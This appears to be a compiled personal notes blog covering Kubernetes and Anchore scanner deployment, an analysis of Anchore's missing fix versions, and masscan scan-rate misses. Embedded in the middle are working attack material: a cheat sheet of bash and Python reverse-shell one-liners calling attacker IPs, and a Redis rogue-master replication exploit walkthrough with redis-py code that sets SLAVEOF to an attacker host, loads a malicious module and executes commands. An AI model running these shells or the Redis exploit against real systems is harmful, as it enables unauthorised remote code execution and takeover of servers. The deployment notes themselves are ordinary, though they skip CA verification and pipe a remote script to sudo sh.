Status: Downloaded newer image for quay.io/coreos/flannel:v0.10.0-amd64
[root@k8s-master ~]# 
[root@k8s-master ~]# mkdir -p /etc/cni/net.d/
[root@k8s-master ~]# vi /etc/cni/net.d/10-flannel.conf
[root@k8s-master ~]# cat /etc/cni/net.d/10-flannel.conf
{"name":"cbr0","type":"flannel","delegate": {"isDefaultGateway": true}}
[root@k8s-master ~]# mkdir /usr/share/oci-umount/oci-umount.d -p
[root@k8s-master ~]# mkdir /run/flannel/
[root@k8s-master ~]# kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/v0.9.1/Documentation/kube-flannel.yml
clusterrole.rbac.authorization.k8s.io/flannel created
clusterrolebinding.rbac.authorization.k8s.io/flannel created
serviceaccount/flannel created
configmap/kube-flannel-cfg created
daemonset.extensions/kube-flannel-ds created
[root@k8s-master ~]# kubectl get nodes
NAME         STATUS   ROLES    AGE     VERSION
k8s-master   Ready    master   8m14s   v1.15.1
[root@k8s-master ~]# vim dig.yml  // test CoreDNS
[root@k8s-master ~]# cat dig.yml 
apiVersion: v1
kind: Pod
metadata:
  name: dig
  namespace: default
spec:
  containers:
  - name: dig
    image:  docker.io/azukiapp/dig
    command:
      - sleep
      - "3600"
    imagePullPolicy: IfNotPresent
  restartPolicy: Always
[root@k8s-master ~]# kubectl apply -f dig.yml
pod/dig created
[root@k8s-master ~]# 
[root@k8s-master ~]# 
[root@k8s-master ~]# kubectl get pods
NAME   READY   STATUS    RESTARTS   AGE
dig    1/1     Running   0          49s
[root@k8s-master ~]# kubectl exec -ti dig -- nslookup kubernetes  // output like the following means DNS is working
Server:		10.96.0.10
Address:	10.96.0.10#53

Name:	kubernetes.default.svc.cluster.local
Address: 10.96.0.1

To add a worker node:

[root@localhost ~]# hostnamectl set-hostname  k8s-node1
[root@k8s-node1 ~]# reboot
[root@k8s-node1 ~]# yum -y install policycoreutils-python*
[root@k8s-node1 ~]# wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/container-selinux-2.68-1.el7.noarch.rpm
[root@k8s-node1 ~]# rpm -ivh container-selinux-2.68-1.el7.noarch.rpm
准备中...                          ################################# [100%]
正在升级/安装...
   1:container-selinux-2:2.68-1.el7   ################################# [100%]
[root@k8s-node1 ~]# yum install -y libltdl.so* pigz* bridge-utils*
[root@k8s-node1 ~]# curl -sSL https://get.docker.com/ | sudo sh
[root@k8s-node1 ~]# vim /etc/yum.repos.d/kubernetes.repo
[root@k8s-node1 ~]# cat /etc/yum.repos.d/kubernetes.repo
[kuberneten]
name=Kubernetes
baseurl=http://mirrors.aliyun.com/kubernetes/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=0
repo_gpgcheck=0
gpgkey=http://mirrors.aliyun.com/kubernetes/yum/doc/yum-key.gpg
        http://mirrors.aliyun.com/kubernetes/yum/doc/rpm-package-key.gpg

[root@k8s-node1 ~]# yum makecache
[root@k8s-node1 ~]# swapoff -a
[root@k8s-node1 ~]# sed -i '/ swap / s/^\(.*\)$/#\1/g' /etc/fstab
[root@k8s-node1 ~]# echo "net.bridge.bridge-nf-call-iptables=1">> /etc/sysctl.conf
[root@k8s-node1 ~]# echo "1" > /proc/sys/net/ipv4/ip_forward
[root@k8s-node1 ~]# modprobe br_netfilter
[root@k8s-node1 ~]# sysctl -p
[root@k8s-node1 ~]# yum install -y kubelet kubeadm kubectl kubernetes-cni
[root@k8s-node1 ~]# systemctl enable docker && systemctl start docker
Created symlink from /etc/systemd/system/multi-user.target.wants/docker.service to /usr/lib/systemd/system/docker.service.
[root@k8s-node1 ~]# systemctl enable kubelet && systemctl start kubelet
Created symlink from /etc/systemd/system/multi-user.target.wants/kubelet.service to /usr/lib/systemd/system/kubelet.service.
[root@k8s-node1 ~]# 
[root@k8s-node1 ~]# mkdir -p /etc/cni/net.d/
[root@k8s-node1 ~]# vi /etc/cni/net.d/10-flannel.conf
[root@k8s-node1 ~]# cat /etc/cni/net.d/10-flannel.conf
{"name":"cbr0","type":"flannel","delegate": {"isDefaultGateway": true}}

Check the bootstrap token on the master:

[root@k8s-master ~]# kubeadm token list  // the token has expired
TOKEN                     TTL         EXPIRES                     USAGES                   DESCRIPTION                                                EXTRA GROUPS
giluwm.lzwt5hgbkxjr42wb   <invalid>   2019-08-06T13:45:14+08:00   authentication,signing   The default bootstrap token generated by 'kubeadm init'.   system:bootstrappers:kubeadm:default-node-token
[root@k8s-master ~]# 
[root@k8s-master ~]# 
[root@k8s-master ~]# kubeadm  token create  // generate a new token
igpl9v.9sfix2xeu9lmekrd

Continue on the node:

[root@k8s-node1 ~]# kubeadm join --token=igpl9v.9sfix2xeu9lmekrd 192.168.47.146:6443 --discovery-token-unsafe-skip-ca-verification

To inspect errors:

[root@localhost ~]# journalctl -f -u kubelet

Fixing missing fix versions for nvdv2 findings in Anchore

Background

After scanning an image with Anchore, I found that vulnerabilities from the nvdv2 feed never carry a fix version, which makes remediation a real problem.
API endpoint: http://192.168.47.144:8228/images/by_id/454010c206d656fd57da9c7bb4aba3cf81afd04aafdb826b50c6db71d07000d9/vuln/all
image

Analysis

My first idea was to find the database column that stores the fix version and backfill it with a script. It turned out the database does not store a fix version for nvdv2 findings at all. As a side note, for vulnerabilities from the vulnerabilities feed, the fix version is stored in the version field of the feed_data_vulnerabilities_fixed_artifacts table. The analysis went as follows.
Starting from the API, the endpoint above is handled by the get_image_vulnerabilities_by_type_imageId function
image
The call chain is: get_image_vulnerabilities_by_type_imageId -> get_image_vulnerabilities_by_type -> vulnerability_query -> client.get_image_vulnerabilities
resp holds the image's vulnerability results
image
So what does get_image_vulnerabilities actually do? It is defined in two places:
/opt/rh/rh-python36/root/usr/lib/python3.6/site-packages/anchore_engine/services/policy_engine/api/controllers/synchronous_operations.py

/opt/rh/rh-python36/root/usr/lib/python3.6/site-packages/anchore_engine/clients/services/policy_engine.py

The client side, get_image_vulnerabilities in clients/services/policy_engine.py, sends a request to the users/{user_id}/images/{image_id}/vulnerabilities endpoint; from the analysis of anchy_get, the host that handles the request is engine-policy-engine
image

image
Searching for users/{user_id}/images/{image_id}/vulnerabilities in swagger.yaml shows that the request is handled by get_image_vulnerabilities in anchore_engine.services.policy_engine.api.controllers.synchronous_operations, which happens to share the same name.
image
Now look at what this get_image_vulnerabilities does: it fetches the vulnerabilities whose feed is vulnerabilities from the database via img.vulnerabilities() and stores them in the rows list, and vuln.fixed_in() is what retrieves the fix version for feed=vulnerabilities
image
Continuing with fixed_in: it is defined in /opt/rh/rh-python36/root/usr/lib/python3.6/site-packages/anchore_engine/db/entities/policy_engine.py and obtains the fix version through fixed_artifact, which in turn queries the feed_data_vulnerabilities_fixed_artifacts table. That wraps up how fix versions are obtained for the vulnerabilities feed.
image
For vulnerabilities whose feed is nvdv2, the get_image_vulnerabilities function in synchronous_operations.py takes a different path and obtains the fix version through get_fixed_in
image
So what does get_fixed_in do? It is also defined in /opt/rh/rh-python36/root/usr/lib/python3.6/site-packages/anchore_engine/db/entities/policy_engine.py. Searching the file turns up three definitions of get_fixed_in; the one that controls nvdv2 fix versions is the one at line 1086, and its code simply returns an empty list
image
To verify the analysis, I changed return [] to return ['2.2'] and checked whether the result changed:
image
The result confirms that this is where the fix-version output is controlled, so code could be added here to achieve the goal. But that approach is invasive, and it would also require a schema change to add a fix-version column to the database, which is a hassle. So I looked for a place to store the fix information with minimal impact on the program and settled on the URL: an anchor can be appended to it, e.g. http://xxx/cve-2019-1234#1.20, which stores the data without breaking the original URL.
image
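
A minimal sketch of that idea in Python (the URL and helper name below are mine, not part of Anchore): the fix version rides along as the URL fragment and can be read back without touching the rest of the record.

from urllib.parse import urlparse

def fix_version_from_url(url):
    """Return the fix version stored as the URL fragment, or None if absent."""
    fragment = urlparse(url).fragment
    return fragment or None

# e.g. the fix version 1.20 is carried in the anchor of an otherwise normal CVE link
print(fix_version_from_url("http://xxx/cve-2019-1234#1.20"))  # -> 1.20
print(fix_version_from_url("http://xxx/cve-2019-5678"))       # -> None

Since the fragment is never sent to the server, the original link keeps working unchanged.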
I initially planned to write a script to add a version to every nvdv2 vulnerability in the database, but it turned out that one vulnerability can map to several version ranges, some inclusive ("including") and some exclusive ("excluding"). Even if all the versions were extracted and appended to the URL, distinguishing inclusive from exclusive ranges would be messy, so I dropped that idea.
image

Conclusion:

My first attempt at deriving a fix version was to take the affected version from https://nvd.nist.gov/ and, if the bound was "including", bump the last digit by one (e.g. 17.12 becomes 17.13); if the bound was "excluding", treat the bound itself as the fix version. That works in most cases, but sometimes the real fix version is not 17.13 but 17.12.1, so this approach is not reliable either. The final approach is (a sketch follows the screenshot below):
1. Get the affected version from https://nvd.nist.gov/
2. Use the affected component name and version to look up, on https://mvnrepository.com/, the release that immediately follows the affected version; that release is taken as the fix version
image
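
A minimal sketch of step 2 in Python, assuming the list of releases has already been fetched from https://mvnrepository.com/ and parsed (the version numbers below are made up for illustration):

def next_release(affected, releases):
    # pick the first published release that sorts after the affected version
    # and treat it as the fix version; real data may need a proper version parser
    def key(v):
        return [int(x) for x in v.split(".") if x.isdigit()]
    candidates = sorted((r for r in releases if key(r) > key(affected)), key=key)
    return candidates[0] if candidates else None

# for an affected 17.12 the next published release may be 17.12.1 rather than 17.13
print(next_release("17.12", ["17.10", "17.12", "17.12.1", "18.0"]))  # -> 17.12.1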

Finally, a screenshot of the end result:
image

Reverse shell

exec 5<>/dev/tcp/172.21.244.134/8008;cat <&5 | while read line; do $line 2>&5 >&5; done // when triggered from crontab, the shell that comes back has no command echo
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

bash -i>& /dev/tcp/192.168.84.111/8888 0>&1
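
An equivalent Python variant, reusing the attacker IP/port from the bash one-liners above, for hosts where bash's /dev/tcp is unavailable:

import os
import socket
import subprocess

# connect back to the attacker's listener and attach stdin/stdout/stderr to the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.84.111", 8888))
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
subprocess.call(["/bin/sh", "-i"])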

Reproducing the Redis master/slave replication attack

Master/slave mode

The master and the slave run on different servers; data written to the master is replicated to the slave. Typically the master handles writes and the slave handles reads.
image
A quick experiment to verify this:
1. Start two Redis instances locally, on ports 6379 (master) and 6380 (slave). Connect a client to port 6379 first and write a few keys
image

2. Connect to port 6380 and run slaveof 127.0.0.1 6379 to make 6379 the master
image
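
The same replication can be verified from a script with the redis-py client, assuming the two local instances started above:

import redis

master = redis.Redis(host="127.0.0.1", port=6379)
slave = redis.Redis(host="127.0.0.1", port=6380)

master.set("replica_test", "hello")        # write goes to the master
print(slave.get("replica_test"))           # the slave returns b'hello' once replication catches up
print(slave.info("replication")["role"])   # -> 'slave'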

Redis modules

Since Redis 4.0, external functionality can be added by loading an .so module, and the FULLRESYNC mechanism can push a file onto a slave. Combining these two features is what makes the attack possible.

Attack steps

1. Connect to the victim's Redis and run SLAVEOF evil_ip evil_port
2. On the victim's Redis, set dir and dbfilename, with dbfilename pointing to the malicious .so file
3. Use replication to write the module onto the victim's disk: +FULLRESYNC <Z*40> 1\r\n$\r\n
4. Load the module on the victim's Redis: MODULE LOAD /tmp/exp_lin.so
5. Once loaded, use system.exec for command execution (a victim-side command sketch follows this list)
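
A minimal victim-side sketch with redis-py, matching the steps above (victim_ip, evil_ip, the port, and the module path are placeholders; the rogue master that actually serves the .so over FULLRESYNC is not shown and is provided by tools such as redis-rogue-server):

import redis

victim = redis.Redis(host="victim_ip", port=6379)

victim.slaveof("evil_ip", 7777)                   # step 1: point the victim at the rogue master
victim.config_set("dir", "/tmp")                  # step 2: directory where the synced file lands
victim.config_set("dbfilename", "exp_lin.so")     # step 2: name it after the malicious module
# step 3 happens on the rogue master: it replies +FULLRESYNC and streams the .so as the "RDB" body
victim.execute_command("MODULE", "LOAD", "/tmp/exp_lin.so")   # step 4
print(victim.execute_command("system.exec", "id"))            # step 5: command execution via the module
victim.slaveof()                                  # SLAVEOF NO ONE: detach from the rogue master afterwards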

Reproduction

Exploit: https://github.com/n0b0dyCN/redis-rogue-server
1. Build exp.so
image
2. Run the attack tool
192.168.47.146 is the victim IP and 6666 is the victim's Redis port
192.168.47.105 is the attacker IP and 7777 is the port the tool's rogue Redis listens on (any free port works)
image

Problems caused by masscan's scan rate

When scanning with masscan, setting the rate too high often leads to missed ports. The screenshot below shows two completely different results against the same host:
image

At a rate of 70000 not a single port was found, while at 7000 two ports were found. I expected some difference, but not one this large; it also means that scans of a large number of hosts produce many false negatives, as shown below:
image

I will probably stop using the masscan+nmap combination for monitoring; it simply misses too much.

Deploying Anchore Engine on Kubernetes with Helm

Background

The official deployment instructions are incomplete: the deployment fails because no PersistentVolume is created for PostgreSQL, and the official docs never mention that you have to create one yourself.

Prerequisites

  • Helm installed
  • Tiller installed
  • A Kubernetes cluster
  • 20 GB of disk space for the database

Installation

1. Update the Helm chart repositories

[root@sec-infoanalysis2-test ops]# helm repo update
Hang tight while we grab the latest from your chart repositories...
...Skip local chart repository
...Successfully got an update from the "stable" chart repository
Update Complete.

2. Install with Helm

[root@sec-infoanalysis2-test ops]# helm install --name anchore stable/anchore-engine --set postgresql.postgresPassword=test,anchoreGlobal.defaultAdminPassword=test,anchoreAnalyzer.layerCacheMaxGigabytes=4,anchoreAnalyzer.replicaCount=5,anchorePolicyEngine.replicaCount=3
NAME:   anchore
LAST DEPLOYED: Wed Oct 23 13:56:29 2019
NAMESPACE: default
STATUS: DEPLOYED

RESOURCES:
==> v1/ConfigMap
NAME                                 DATA  AGE
anchore-anchore-engine           4     0s
anchore-anchore-engine-analyzer  1     0s
anchore-postgresql               0     0s

==> v1/Deployment
NAME                                    READY  UP-TO-DATE  AVAILABLE  AGE
anchore-anchore-engine-analyzer     0/1    1           0          0s
anchore-anchore-engine-api          0/1    1           0          0s
anchore-anchore-engine-catalog      0/1    1           0          0s
anchore-anchore-engine-policy       0/1    1           0          0s
anchore-anchore-engine-simplequeue  0/1    0           0          0s

3. Check the pod status: the postgresql pod is stuck in Pending because no PV has been created, which the official tutorial never points out.

[root@sec-infoanalysis2-test ops]# kubectl get pods
NAME                                                     READY   STATUS    RESTARTS   AGE
anchore-anchore-engine-analyzer-779c48d479-8gtvl     0/1     Running   0          11s
anchore-anchore-engine-api-5c67f58476-lc6rp          0/1     Running   0          11s
anchore-anchore-engine-catalog-99db9fd77-fkfkr       0/1     Running   0          11s
anchore-anchore-engine-policy-bcff8c8fc-lm4k2        0/1     Running   0          11s
anchore-anchore-engine-simplequeue-5cdcb9c74-wq72v   0/1     Running   0          11s
anchore-postgresql-c6657b6c7-4hwh5                   0/1     Pending   0          11s
[root@sec-infoanalysis2-test ops]# kubectl get pvc
NAME                     STATUS    VOLUME   CAPACITY   ACCESS MODES   STORAGECLASS   AGE
anchore-postgresql   Pending                                                     4m20s
[root@sec-infoanalysis2-test ops]# kubectl get pv
No resources found.

4. Create the PV. NFS is used here; setting up the NFS server itself is out of scope.

[root@sec-infoanalysis2-test ops]# cat pv.yaml 
kind: PersistentVolume
apiVersion: v1
metadata:
  name: anchore-pv-volume
  labels:
    type: postgresql
spec:
  capacity:
    storage: 20Gi
  accessModes:
    - ReadWriteOnce
  nfs:
    server: 192.168.47.146 
    path: "/data"
[root@sec-infoanalysis2-test ops]# showmount -e localhost //list the NFS exports
Export list for localhost:
/data *
[root@sec-infoanalysis2-test ops]# kubectl create -f pv.yaml 
persistentvolume/anchore-pv-volume created
[root@sec-infoanalysis2-test ops]# kubectl get pv
NAME                CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS      CLAIM   STORAGECLASS   REASON   AGE
anchore-pv-volume   20Gi       RWO            Retain           Available                                   4s
[root@sec-infoanalysis2-test ops]# kubectl get pv
NAME                CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS   CLAIM                        STORAGECLASS   REASON   AGE
anchore-pv-volume   20Gi       RWO            Retain           Bound    default/anchore-postgresql                           12s
[root@sec-infoanalysis2-test ops]# kubectl get pvc
NAME                 STATUS   VOLUME              CAPACITY   ACCESS MODES   STORAGECLASS   AGE
anchore-postgresql   Bound    anchore-pv-volume   20Gi       RWO                           3m24s

5. Check Anchore's status

[root@sec-infoanalysis1-test ops]# pip install anchorecli  //install the client
[root@sec-infoanalysis1-test ops]# anchore-cli --u admin --p test --url http://10.103.227.236:8228/v1 system status
Service policy_engine (anchore-anchore-engine-policy-bcff8c8fc-lm4k2, http://anchore-anchore-engine-policy:8087): up
Service simplequeue (anchore-anchore-engine-simplequeue-5cdcb9c74-wq72v, http://anchore-anchore-engine-simplequeue:8083): up
Service analyzer (anchore-anchore-engine-analyzer-779c48d479-8gtvl, http://anchore-anchore-engine-analyzer:8084): up
Service apiext (anchore-anchore-engine-api-5c67f58476-lc6rp, http://anchore-anchore-engine-api:8228): up
Service catalog (anchore-anchore-engine-catalog-99db9fd77-fkfkr, http://anchore-anchore-engine-catalog:8082): up

Engine DB Version: 0.0.11
Engine Code Version: 0.5.1

6. Expose the service
Create a Service named anchore-engine that exposes port 8228 of the pods so that Jenkins can call it. EXTERNAL-IP will inevitably stay <pending> because no cloud load balancer (e.g. from Amazon) is in use; the exposed service is reachable at any node's real IP on port 31627.

[root@sec-infoanalysis2-test ops]# kubectl expose deployment anchore-anchore-engine-api --type=LoadBalancer --name=anchore-engine --port=8228 
service/anchore-engine exposed
[root@sec-infoanalysis2-test ops]# kubectl get svc
NAME                                     TYPE           CLUSTER-IP       EXTERNAL-IP   PORT(S)          AGE
anchore-anchore-engine-api           ClusterIP      10.103.227.236   <none>        8228/TCP         131m
anchore-anchore-engine-catalog       ClusterIP      10.104.243.28    <none>        8082/TCP         131m
anchore-anchore-engine-policy        ClusterIP      10.105.2.122     <none>        8087/TCP         131m
anchore-anchore-engine-simplequeue   ClusterIP      10.100.39.207    <none>        8083/TCP         131m
anchore-postgresql                   ClusterIP      10.111.41.100    <none>        5432/TCP         131m
anchore-engine                           LoadBalancer   10.101.52.243    <pending>     8228:31627/TCP   2s

[root@sec-infoanalysis1-test ops]# anchore-cli --u admin --p test --url http://192.168.47.144:31627/v1 system status
Service catalog (anchore-anchore-engine-catalog-99db9fd77-fkfkr, http://anchore-anchore-engine-catalog:8082): up
Service policy_engine (anchore-anchore-engine-policy-bcff8c8fc-lm4k2, http://anchore-anchore-engine-policy:8087): up
Service simplequeue (anchore-anchore-engine-simplequeue-5cdcb9c74-wq72v, http://anchore-anchore-engine-simplequeue:8083): up
Service analyzer (anchore-anchore-engine-analyzer-779c48d479-8gtvl, http://anchore-anchore-engine-analyzer:8084): up
Service apiext (anchore-anchore-engine-api-5c67f58476-lc6rp, http://anchore-anchore-engine-api:8228): up

Engine DB Version: 0.0.11
Engine Code Version: 0.5.1
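
A quick reachability check of the exposed NodePort from Python (IP, port, and credentials as in the transcript above; this only verifies that the service answers on the /v1 base URL used by anchore-cli, it does not assume any particular API route):

import requests

base = "http://192.168.47.144:31627/v1"
resp = requests.get(base, auth=("admin", "test"), timeout=5)
# any HTTP response at all proves the NodePort is reachable from outside the cluster
print(resp.status_code)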

Troubleshooting:

1. If you see MountVolume.SetUp failed for volume "anchore-pv-volume" : mount failed: exit status 32, the Kubernetes node is missing the NFS client packages; install them with: yum install nfs-common nfs-utils -y

[root@sec-infoanalysis2-test ~]# kubectl describe pod anchore-postgresql-c6657b6c7-4hwh5
Name:           anchore-postgresql-c6657b6c7-4hwh5
Namespace:      default
Priority:       0
Node:           sec-k8s-node1/192.168.47.144
Start Time:     Wed, 23 Oct 2019 14:33:47 +0800
Labels:         app=postgresql
                pod-template-hash=c6657b6c7
                release=anchore-chj
Annotations:    <none>
Status:         Pending
IP:             
Controlled By:  ReplicaSet/anchore-postgresql-c6657b6c7
Containers:
  anchore-postgresql:
    Container ID:   
    Image:          postgres:9.6.2
    Image ID:       
    Port:           5432/TCP
    Host Port:      0/TCP
    State:          Waiting
      Reason:       ContainerCreating
    Ready:          False
    Restart Count:  0
    Requests:
      cpu:      100m
      memory:   256Mi
    Liveness:   exec [sh -c exec pg_isready --host $POD_IP] delay=60s timeout=5s period=10s #success=1 #failure=6
    Readiness:  exec [sh -c exec pg_isready --host $POD_IP] delay=5s timeout=3s period=5s #success=1 #failure=3
    Environment:
      POSTGRES_USER:         anchoreengine
      PGUSER:                anchoreengine
      POSTGRES_DB:           anchore
      POSTGRES_INITDB_ARGS:  
      PGDATA:                /var/lib/postgresql/data/pgdata
      POSTGRES_PASSWORD:     <set to the key 'postgres-password' in secret 'anchore-postgresql'>  Optional: false
      POD_IP:                 (v1:status.podIP)
    Mounts:
      /var/lib/postgresql/data/pgdata from data (rw,path="postgresql-db")
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-m4s9k (ro)
Conditions:
  Type              Status
  Initialized       True 
  Ready             False 
  ContainersReady   False 
  PodScheduled      True 
Volumes:
  data:
    Type:       PersistentVolumeClaim (a reference to a PersistentVolumeClaim in the same namespace)
    ClaimName:  anchore-postgresql
    ReadOnly:   false
  default-token-m4s9k:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-m4s9k
    Optional:    false
QoS Class:       Burstable
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute for 300s
                 node.kubernetes.io/unreachable:NoExecute for 300s
Events:
  Type     Reason            Age                   From                    Message
  ----     ------            ----                  ----                    -------
  Warning  FailedScheduling  5m40s (x30 over 42m)  default-scheduler       pod has unbound immediate PersistentVolumeClaims (repeated 2 times)
  Normal   Scheduled         5m36s                 default-scheduler       Successfully assigned default/anchore-postgresql-c6657b6c7-4hwh5 to sec-k8s-node1
  Warning  FailedMount       5m35s                 kubelet, sec-k8s-node1  MountVolume.SetUp failed for volume "anchore-pv-volume" : mount failed: exit status 32

Using an external database is recommended:

# helm install --name anchore stable/anchore-engine --set postgresql.postgresPassword=xxx,anchoreGlobal.defaultAdminPassword=xxx,postgresql.postgresUser=postgres,postgresql.postgresDatabase=anchore,postgresql.externalEndpoint=192.168.47.146:5432,anchoreGlobal.logLevel=DEBUG,anchore-feeds-db.postgresPassword=xxx,anchore-feeds-db.externalEndpoint=192.168.47.146:5432,anchoreAnalyzer.layerCacheMaxGigabytes=4

Reference:
https://docs.anchore.com/current/docs/engine/engine_installation/helm/
